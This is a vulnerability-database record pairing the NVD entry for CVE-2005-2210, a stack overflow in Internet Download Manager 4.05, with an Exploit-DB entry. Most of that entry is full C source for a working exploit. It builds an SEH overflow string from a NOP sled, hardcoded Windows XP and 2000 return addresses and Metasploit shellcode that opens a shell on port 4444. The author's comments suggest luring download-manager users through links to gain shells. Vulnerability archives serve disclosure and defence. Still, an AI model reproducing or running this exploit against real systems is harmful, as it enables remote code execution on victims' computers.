{"cve": [{"lastseen": "2020-10-03T11:34:55", "description": "Stack-based buffer overflow in Internet Download Manager 4.05 allows remote attackers to execute arbitrary code via a long URL.", "edition": 3, "cvss3": {}, "published": "2005-07-11T04:00:00", "title": "CVE-2005-2210", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2005-2210"], "modified": "2008-09-05T20:51:00", "cpe": ["cpe:/a:tonec_inc.:internet_download_manager:4.05"], "id": "CVE-2005-2210", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2210", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:tonec_inc.:internet_download_manager:4.05:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-01-31T13:31:58", "description": "Internet Download Manager <= 4.05 Input URL Stack Overflow Exploit. CVE-2005-2210. 
Local exploit for windows platform", "published": "2005-07-06T00:00:00", "type": "exploitdb", "title": "Internet Download Manager <= 4.0.5 - Input URL Stack Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-2210"], "modified": "2005-07-06T00:00:00", "id": "EDB-ID:1091", "href": "https://www.exploit-db.com/exploits/1091/", "sourceData": "/*\r\n\r\n Title : Internet Download Manager =< 4.05 universal remote overflow Exploit\r\n bug analyse and exploit code by : c0d3r \"Kaveh Razavi\" c0d3r@ihsteam.com\r\n my advisory : http://www.ihsteam.com/advisory/download_manager_adv.txt\r\n \r\n ************************************************************************\r\n \r\n this bug is different from what was found in application called altnet\r\n download manager .\r\n if you read the code carefully you see that I left thingz for you .\r\n well if you want to create an html file linked to evil download offer\r\n needed thingz are there , but in IE they are not usable cause exploit\r\n string is bigger than IE input buffer .\r\n I was analysing this bug and I was thinking about how to code an exploit\r\n for this issue , then new Mozilla exploit came up ! yea the idea of saving\r\n the exploit string into a file then copy/paste it to download manager \r\n input url . there are other ways for sure . kiddies still can have fun\r\n with this code just as I mentioned with a bit scripting in java or other \r\n shits you can link exploit string which will be created in file exploit.txt\r\n you can have a bad file , anyone using download manager can give a shell !\r\n hint! 
: any other folder is being counted , so my suggestion is linking to \r\n root webfolder .\r\n sample usage shown in a 1 minute movie which can be downloaded at :\r\n http://www.ihsteam.com/download/video/dlm.rar\r\n \r\n ************************************************************************\r\n\r\n Exploit method : Structured Exception Handling known as SEH .\r\n Targets : should work on all win2000 and win xp's even sp2 ,\r\n Tested : winxp sp 1 and win2000 server sp 4\r\n compile : ms visual c++ 6 : cl dlm.c\r\n \r\n ************************************************************************\r\n\r\n Greetingz :\r\n \r\n www.ihsteam.com LorD and NT , LorD always makes me happy with those\r\n www.ihssecurity.com Nasa , berkely , stanford ,... shells :>\r\n www.exploitdev.com yeah me and jamie are just started , u r0x jamie ,\r\n www.metasploit.com fewer words better ones , great !\r\n www.class101.org nice work is being done here ! class I used ur offsets :)\r\n www.c0d3r.org my home ,nth here right now but those nice Essence words.\r\n other Folks and friends not mentioned here .\r\n\r\n*/ \r\n\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <windows.h>\r\n#define exploit \"exploit.txt\"\r\n#define NOP 0x90\r\n#define size 2519\r\n \r\n int main(int argc,char **argv)\r\n{\r\n\r\n/*\r\nchar crap1[]= 
\r\n\"\\x3C\\x48\\x45\\x41\\x44\\x3E\"\r\n\"\\x3C\\x6D\\x65\\x74\\x61\\x20\\x68\\x74\\x74\\x70\\x2D\\x65\"\r\n\"\\x71\\x75\\x69\\x76\\x3D\\x22\\x43\\x6F\\x6E\\x74\\x65\\x6E\"\r\n\"\\x74\\x2D\\x54\\x79\\x70\\x65\\x22\\x20\\x63\\x6F\\x6E\\x74\"\r\n\"\\x65\\x6E\\x74\\x3D\\x22\\x74\\x65\\x78\\x74\\x2F\\x68\\x74\"\r\n\"\\x6D\\x6C\\x3B\\x20\\x63\\x68\\x61\\x72\\x73\\x65\\x74\\x3D\"\r\n\"\\x69\\x73\\x6F\\x2D\\x38\\x38\\x35\\x39\\x2D\\x31\\x22\\x3E\"\r\n\"\\x3C\\x6D\\x65\\x74\\x61\\x20\\x68\\x74\\x74\\x70\\x2D\\x65\"\r\n\"\\x71\\x75\\x69\\x76\\x3D\\x22\\x72\\x65\\x66\\x72\\x65\\x73\"\r\n\"\\x68\\x22\\x20\\x63\\x6F\\x6E\\x74\\x65\\x6E\\x74\\x3D\\x22\"\r\n\"\\x33\\x3B\\x20\\x55\\x52\\x4C\\x3D\";\r\nchar crap2[]= \"\\x22\\x3E\";\r\nchar crap3[]=\r\n\"\\x3C\\x2F\\x68\\x65\\x61\\x64\\x3E\"\r\n\"\\x3C\\x2F\\x42\\x4F\\x44\\x59\\x3E\"\r\n\"\\x3C\\x2F\\x48\\x54\\x4D\\x4C\\x3E\";\r\n*/\r\n char crap4[]= \"\\x31\\x31\\x2E\";\r\n\r\n\r\n// metasploit shellc0de wow!!! LPORT=4444 Size=399 \r\n unsigned char shellcode[] 
=\r\n\"\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x31\\xc9\\xb1\\x5e\\x81\\x73\\x17\\x4f\\x85\"\r\n\"\\x2f\\x98\\x83\\xeb\\xfc\\xe2\\xf4\\xb3\\x6d\\x79\\x98\\x4f\\x85\\x7c\\xcd\\x19\"\r\n\"\\xd2\\xa4\\xf4\\x6b\\x9d\\xa4\\xdd\\x73\\x0e\\x7b\\x9d\\x37\\x84\\xc5\\x13\\x05\"\r\n\"\\x9d\\xa4\\xc2\\x6f\\x84\\xc4\\x7b\\x7d\\xcc\\xa4\\xac\\xc4\\x84\\xc1\\xa9\\xb0\"\r\n\"\\x79\\x1e\\x58\\xe3\\xbd\\xcf\\xec\\x48\\x44\\xe0\\x95\\x4e\\x42\\xc4\\x6a\\x74\"\r\n\"\\xf9\\x0b\\x8c\\x3a\\x64\\xa4\\xc2\\x6b\\x84\\xc4\\xfe\\xc4\\x89\\x64\\x13\\x15\"\r\n\"\\x99\\x2e\\x73\\xc4\\x81\\xa4\\x99\\xa7\\x6e\\x2d\\xa9\\x8f\\xda\\x71\\xc5\\x14\"\r\n\"\\x47\\x27\\x98\\x11\\xef\\x1f\\xc1\\x2b\\x0e\\x36\\x13\\x14\\x89\\xa4\\xc3\\x53\"\r\n\"\\x0e\\x34\\x13\\x14\\x8d\\x7c\\xf0\\xc1\\xcb\\x21\\x74\\xb0\\x53\\xa6\\x5f\\xce\"\r\n\"\\x69\\x2f\\x99\\x4f\\x85\\x78\\xce\\x1c\\x0c\\xca\\x70\\x68\\x85\\x2f\\x98\\xdf\"\r\n\"\\x84\\x2f\\x98\\xf9\\x9c\\x37\\x7f\\xeb\\x9c\\x5f\\x71\\xaa\\xcc\\xa9\\xd1\\xeb\"\r\n\"\\x9f\\x5f\\x5f\\xeb\\x28\\x01\\x71\\x96\\x8c\\xda\\x35\\x84\\x68\\xd3\\xa3\\x18\"\r\n\"\\xd6\\x1d\\xc7\\x7c\\xb7\\x2f\\xc3\\xc2\\xce\\x0f\\xc9\\xb0\\x52\\xa6\\x47\\xc6\"\r\n\"\\x46\\xa2\\xed\\x5b\\xef\\x28\\xc1\\x1e\\xd6\\xd0\\xac\\xc0\\x7a\\x7a\\x9c\\x16\"\r\n\"\\x0c\\x2b\\x16\\xad\\x77\\x04\\xbf\\x1b\\x7a\\x18\\x67\\x1a\\xb5\\x1e\\x58\\x1f\"\r\n\"\\xd5\\x7f\\xc8\\x0f\\xd5\\x6f\\xc8\\xb0\\xd0\\x03\\x11\\x88\\xb4\\xf4\\xcb\\x1c\"\r\n\"\\xed\\x2d\\x98\\x5e\\xd9\\xa6\\x78\\x25\\x95\\x7f\\xcf\\xb0\\xd0\\x0b\\xcb\\x18\"\r\n\"\\x7a\\x7a\\xb0\\x1c\\xd1\\x78\\x67\\x1a\\xa5\\xa6\\x5f\\x27\\xc6\\x62\\xdc\\x4f\"\r\n\"\\x0c\\xcc\\x1f\\xb5\\xb4\\xef\\x15\\x33\\xa1\\x83\\xf2\\x5a\\xdc\\xdc\\x33\\xc8\"\r\n\"\\x7f\\xac\\x74\\x1b\\x43\\x6b\\xbc\\x5f\\xc1\\x49\\x5f\\x0b\\xa1\\x13\\x99\\x4e\"\r\n\"\\x0c\\x53\\xbc\\x07\\x0c\\x53\\xbc\\x03\\x0c\\x53\\xbc\\x1f\\x08\\x6b\\xbc\\x5f\"\r\n\"\\xd1\\x7f\\xc9\\x1e\\xd4\\x6e\\xc9\\x06\\xd4\\x7e\\xcb\\x1e\\x7a\\x5a\\x98\\x27\"\r\n\"\\xf7\\xd1\\x2b\\x59\\x7a\\x7a\\x9c\\xb0\\x55\\xa6\\x7e\\
xb0\\xf0\\x2f\\xf0\\xe2\"\r\n\"\\x5c\\x2a\\x56\\xb0\\xd0\\x2b\\x11\\x8c\\xef\\xd0\\x67\\x79\\x7a\\xfc\\x67\\x3a\"\r\n\"\\x85\\x47\\x68\\xc5\\x81\\x70\\x67\\x1a\\x81\\x1e\\x43\\x1c\\x7a\\xff\\x98\";\r\n FILE *fp; \r\n char buffer[size];\r\n unsigned int os;\r\n char ppr[5];\r\n char jmp[] = \"\\xEB\\x0C\\x90\\x90\";\r\n char winxp[] = \"\\xB1\\x2C\\xC2\\x77\"; \r\n char win2000[] =\"\\x08\\xB0\\x01\\x78\";\r\n if(argc < 2) {\r\n printf(\"\\n-------- Download Manager remote exploit\\n\");\r\n printf(\"-------- copyrighted by c0d3r of IHS 2005\\n\");\r\n printf(\"-------- usage : dlm.exe target\\n\");\r\n printf(\"-------- target 1 : windows xp all service packs all languages : 0\\n\");\r\n printf(\"-------- target 2 : windows 2000 all service packs all languages : 1\\n\");\r\n printf(\"-------- eg : dlm.exe 0\\n\");\t\r\n printf(\"-------- out file will be exploit.txt for windows xp\\n\\n\");\r\n exit(-1) ;\r\n } \r\n os = (unsigned short)atoi(argv[1]); \t \r\n switch(os)\r\n {\r\n case 0:\r\n strcat(ppr,winxp);\r\n break;\r\n case 1:\r\n strcat(ppr,win2000); \r\n break;\r\n default:\r\n printf(\"\\n[-] this target doesnt exist in the list\\n\\n\");\r\n \r\n exit(-1);\r\n }\r\n printf(\"\\n-------- Download Manager remote exploit\\n\");\r\n printf(\"-------- copyrighted by c0d3r of IHS 2005\\n\");\r\n \r\n // heart of exploit\r\n \r\n printf(\"-------- building overflow string\\n\");\r\n memset(buffer,NOP,size);\r\n memcpy(buffer,crap4,sizeof(crap4)-1);\r\n\tmemcpy(buffer+3+2077,jmp,4);\r\n\tmemcpy(buffer+3+2077+4,ppr,4);\r\n\tmemcpy(buffer+3+2077+4+40,shellcode,sizeof(shellcode)-1);\r\n\tbuffer[size] = 0;\r\n \r\n\t/*\r\n memcpy(buffer,crap1,sizeof(crap1)-1);\r\n\tmemcpy(buffer+122,crap4,sizeof(crap4)-1);\r\n memcpy(buffer+2192,jmp,4);\r\n memcpy(buffer+2196,ppr,4);\r\n memcpy(buffer+2200,shellcode,sizeof(shellcode)-1);\r\n memcpy(buffer+2599,crap2,sizeof(crap2)-1);\r\n memcpy(buffer+2601,crap3,sizeof(crap3)-1);\r\n buffer[size] = 0;\r\n */\r\n\t\r\n // EO heart of 
exploit \r\n \r\n\tprintf(\"-------- Done !\\n\");\r\n printf(\"-------- Creating the exploit.txt file\\n\");\r\n fp = fopen(exploit, \"w+\");\r\n fwrite(buffer, sizeof ( unsigned char ), sizeof(buffer), fp);\r\n fclose(fp);\r\n printf(\"-------- Done ! enjoy it !\\n\");\r\n return 0;\r\n\r\n}\n\n// milw0rm.com [2005-07-06]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1091/"}]}